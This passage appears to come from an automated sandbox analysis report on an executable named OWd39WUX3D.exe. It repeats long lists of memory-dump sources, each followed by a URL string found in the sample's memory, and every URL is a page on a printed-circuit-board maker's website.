00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-capabilities/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-design-layout/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-restoration/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcba-services/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/special-offer-specifications/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/stencil/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/testimonial/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/about-us/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/agents-brokers/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/awards-certificates/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/our-facilities/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/privacy-policy/
